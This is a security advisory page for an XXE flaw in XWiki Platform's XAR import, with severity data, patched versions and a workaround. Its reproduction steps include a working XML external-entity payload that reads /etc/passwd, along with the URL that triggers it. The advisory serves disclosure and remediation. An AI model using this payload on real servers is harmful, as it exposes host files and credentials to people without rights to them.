GHSA-gx4f-976g-7g6v
Suggest an improvement- Source
- https://github.com/advisories/GHSA-gx4f-976g-7g6v
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-gx4f-976g-7g6v/GHSA-gx4f-976g-7g6v.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-gx4f-976g-7g6v
- Aliases
- Published
- 2023-03-08T17:19:30Z
- Modified
- 2023-11-08T04:12:04.667210Z
- Severity
-
- 7.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N CVSS Calculator
- Summary
- XWiki Platform vulnerable to data leak via Improper Restriction of XML External Entity Reference
- Details
-
Impact
Any user with edit rights on a document can trigger a XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host.
Example to reproduce: * Create a forget XAR file and inside it, have the following
package.xmlcontent:
* Upload it onto a wiki page (e.g.<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <package> <infos> <name>&xxe;</name> <description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description> <licence></licence> <author>XWiki.Admin</author> ...XXE) as an attachment (e.g.test.xar). * Call the page usinghttp://localhost:8080/xwiki/bin/view/Main/XXE?sheet=XWiki.AdminImportSheet&file=test.xarYou'll then notice that the displayed UI contains the content of the
/etc/passwdfile.Patches
The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1.
Workarounds
You'd need to get XWiki Platform sources and apply the changes from https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434 to the
XarPackagejava class and then copy the modified version to yourWEB-INF/classesdirectory (or rebuild thexwiki-platform-xar-modelmaven module and replace the one found inWEB-INF/lib/).References
- https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434
- https://jira.xwiki.org/browse/XWIKI-20320
For more information
If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List
- Database specific
{ "nvd_published_at": "2023-03-07T19:15:00Z", "github_reviewed_at": "2023-03-08T17:19:30Z", "severity": "HIGH", "github_reviewed": true, "cwe_ids": [ "CWE-611" ] }- References
Affected packages
Maven / org.xwiki.platform:xwiki-platform-xar-model
Package
- Name
- org.xwiki.platform:xwiki-platform-xar-model
- View open source insights on deps.dev
- Purl
- pkg:maven/org.xwiki.platform/xwiki-platform-xar-model
Maven / org.xwiki.platform:xwiki-platform-xar-model
Package
- Name
- org.xwiki.platform:xwiki-platform-xar-model
- View open source insights on deps.dev
- Purl
- pkg:maven/org.xwiki.platform/xwiki-platform-xar-model
Maven / org.xwiki.platform:xwiki-platform-xar-model
Package
- Name
- org.xwiki.platform:xwiki-platform-xar-model
- View open source insights on deps.dev
- Purl
- pkg:maven/org.xwiki.platform/xwiki-platform-xar-model